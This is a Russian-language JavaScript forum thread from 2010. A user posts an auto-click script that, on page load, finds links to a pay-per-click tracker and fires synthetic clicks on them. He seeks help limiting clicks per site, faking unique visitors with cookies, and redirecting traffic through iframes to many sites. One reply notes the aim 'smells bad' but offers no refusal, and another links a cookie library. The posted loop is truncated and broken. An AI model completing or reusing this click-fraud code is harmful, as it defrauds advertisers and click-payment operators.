Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 22.02.2010, 14:29
Интересующийся
Отправить личное сообщение для qwestwest Посмотреть профиль Найти все сообщения от qwestwest
 
Регистрация: 20.02.2010
Сообщений: 18

Помогите доделать скрипт
Значит есть такой скрипт
function clickLink(link) {
var cancelled = false;

if (document.createEvent) {
var event = document.createEvent("MouseEvents");
event.initMouseEvent("click", true, true, window,
0, 0, 0, 0, 0,
false, false, false, false,
0, null);
cancelled = !link.dispatchEvent(event);
}
else if (link.fireEvent) {
cancelled = !link.fireEvent("onclick");
}

if (!cancelled) {
window.location = link.href;
}
}

function doAutoclick() {
//маска (шаблон) для поиска ссылок
var mask = "http://web.tak.ru/klik.php?key";
//получаем список всех ссылок на странице

var links = document.getElementsByTagName("a");
//определяем случайное число пропускаемых ссылок (0 .. 9)
var skipLinksCount = Math.floor(Math.random()*10);

//перебираем ссылки
for(var i = 0; i -1) {
//если разрешено кликать (уже пропустили нужное кол-во ссылок)
if (skipLinksCount == 0) {
//отображаем ее во всплывающем сообщении (или кликаем по ней - тогда links[i].click)
clickLink(links[i]);
//прерываем перебор
break;
} else {
//учитываем "пропущенную" ссылку
skipLinksCount--;
}
}
}
}
нужно доделать до путя...нужно только 2 клика на на одном сайте за 48 часов(уникальность)))+ подскажите как правильно подгружать - так что б наверняк))
Я пробивал <<body onLoad="setTimeout("doAutoclick()",10000);">
но что та не получилось
Ну и если Кто нибуть стикалса с ифреймами-редиректами - поделитесь опитам(скриптиком ) как с одново сайта редиректить на 100 сайтов
В основном нужни Уники (по 2 на каждий сайт) тоисть 2 уника зашло на первий сайт следующих 2 уника идут на второй сайт итд
Ответить с цитированием
  #2 (permalink)  
Старый 22.02.2010, 16:19
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

а)Пожалуйста, отформатируйте свой код!

Для этого его можно заключить в специальные теги: js/css/html и т.п., например:
[js]
... ваш код...
[/js]


О том, как вставить в сообщение исполняемый javascript и html-код, а также о дополнительных возможностях форматирования - читайте http://javascript.ru/formatting.
б)Здравствуйте!

Судя по вашему сообщению, вы ну совсем не знаете javascript.

Освойте основы языка и вопрос отпадет сам, полностью или частично.
А с чем не справитесь - поможем.

На сайте javascript можно начать изучать с учебника, раздел Основы javascript.
Возможно, вам также понадобится HTML - учебник есть, например, здесь: http://ru.html.net/tutorials/html/

Задавайте конкретные вопросы по ходу дела.
в)цели вашего скрипта плохо пахнут
Ответить с цитированием
  #3 (permalink)  
Старый 22.02.2010, 16:57
Интересующийся
Отправить личное сообщение для qwestwest Посмотреть профиль Найти все сообщения от qwestwest
 
Регистрация: 20.02.2010
Сообщений: 18

Здравствуйте!
Спасибо что хоть кому то не безразлично жизнь "аматоров")
Да, Ви действительно не ошиблись на счет меня - я только учусь(2 день!)
Что то подсказали что то сам - от и получилса скрипт
Что би проверить скрипт - нужно все то что я описал(*)
Я понимаю что с ІР вроде как JS не должен заниматса(*он же клиентский язик) но так как учить PHP или Perl або Pyhton - очень много времени
Но вроде как С помощу "Чудо Язика" - JS можно повлиять на Cookies...
Пахнет- да...не ошиблись Ви и здесь - я один из тех хто гонитса за деньгами
Стидно - но ничиво с собой не могу поделать!
Не судите строго(
Ответить с цитированием
  #4 (permalink)  
Старый 22.02.2010, 17:43
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

Эх
Трудно вас читать.
Пожалуйста проверяйте текст на грамотность прежде чем отправлять.
Очень трудно читать.
Сообщение от qwestwest
Да, Ви действительно не ошиблись на счет меня - я только учусь(2 день!)
продолжайте в том же духе.
не вникал полностью в суть вашей проблемы(первый пост не читается абсолютно из-за отсутствия форматирования кода), но она достаточна несложна, и думаю вы через день-два сможете ее решить самостоятельно.
При этом вы получите не только конечную денежную выгоду, но и драгоценный опыт
Сообщение от qwestwest
Пахнет- да...не ошиблись Ви и здесь - я один из тех хто гонитса за деньгами
на самом деле я не моралист. я сам работаю на грани серых и черных технологий.
но, я тонко намекаю, что если вы хотите заработать деньги, то вы должно что-то вложить.
Либо свое время на изучение языка, и написание скрипта
Либо свои деньги на то, чтобы за вас все сделали.
Я полагаю вам предпочтительней первый вариант. Полезней для общего развития
Ответить с цитированием
  #5 (permalink)  
Старый 22.02.2010, 18:11
Интересующийся
Отправить личное сообщение для qwestwest Посмотреть профиль Найти все сообщения от qwestwest
 
Регистрация: 20.02.2010
Сообщений: 18

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru"> 

<meta name="keywords" content="" /> 
<meta name="description" content="" /> 
<link type="text/css" rel="StyleSheet" href="http://anekdotik.at.ua/_st/my.css"> 
<head> 
<title>@@@)))</title>
<head>
[JS]
function clickLink(link) {
var cancelled = false;

if (document.createEvent) {
var event = document.createEvent("MouseEvents");
event.initMouseEvent("click", true, true, window,
0, 0, 0, 0, 0,
false, false, false, false,
0, null);
cancelled = !link.dispatchEvent(event);
}
else if (link.fireEvent) {
cancelled = !link.fireEvent("onclick");
}

if (!cancelled) {
window.location = link.href;
}
}

function doAutoclick() {
//маска (шаблон) для поиска ссылок
var mask = "http://web.tak.ru/klik.php?key";
//получаем список всех ссылок на странице 

var links = document.getElementsByTagName("a");
//определяем случайное число пропускаемых ссылок (0 .. 9)
var skipLinksCount = Math.floor(Math.random()*10);

//перебираем ссылки
for(var i = 0; i -1) {
//если разрешено кликать (уже пропустили нужное кол-во ссылок) 
if (skipLinksCount == 0) {
//отображаем ее во всплывающем сообщении (или кликаем по ней - тогда links[i].click)
clickLink(links[i]);
//прерываем перебор
break; 
} else {
//учитываем "пропущенную" ссылку
skipLinksCount--;
}
}
}
}[/JS]</head>
<body onLoad="setTimeout("doAutoclick()",10000);"> 
тра та та та та)))
</body>

Будто отформатирован как надо - где моя ошибка - покажите пожалуйста
А на счет кукисов сам я несправлюсь ... денег не много но если это будет основная мотивация (! А так наверное и есть ))))) то я готов заплатить - не так за готовый продукт как за правильную трактовку
Приму любую помощь
Заранее спасибо!

Последний раз редактировалось qwestwest, 22.02.2010 в 18:13.
Ответить с цитированием
  #6 (permalink)  
Старый 22.02.2010, 21:07
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Сообщение от qwestwest
А на счет кукисов сам я несправлюсь
http://github.com/Kolyaj/CrossJS/blo...urce/cookie.js
Ответить с цитированием
  #7 (permalink)  
Старый 23.02.2010, 11:36
Интересующийся
Отправить личное сообщение для qwestwest Посмотреть профиль Найти все сообщения от qwestwest
 
Регистрация: 20.02.2010
Сообщений: 18

Ой,спасибо!
Да что то в етом есть!)))
вопрос номер 2:как обединить ифрейм-редирект и кукиси.Для чево?
Для перерозпредиления людей - по 2 человека на сайт(по 2 уникальних Ір на сайт)
Тоисть,скрипт будет делать толька 2 клика на 2 уника - надеюсь правильно обяснил
Еще раз большое спасибо!!!
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите настроить скрипт раскрывающегося меню melomanfm Работа 6 10.08.2009 01:21
Помогите доработать хороший скрипт! KiLLka Я не знаю javascript 3 10.06.2009 23:37
Помогите создать скрипт замены картинок при наведении курсора. SantaS Я не знаю javascript 3 05.06.2009 12:59
Люди, помогите адаптировать скрипт под Оперу KiLLk Opera, Safari и др. 1 01.06.2009 01:05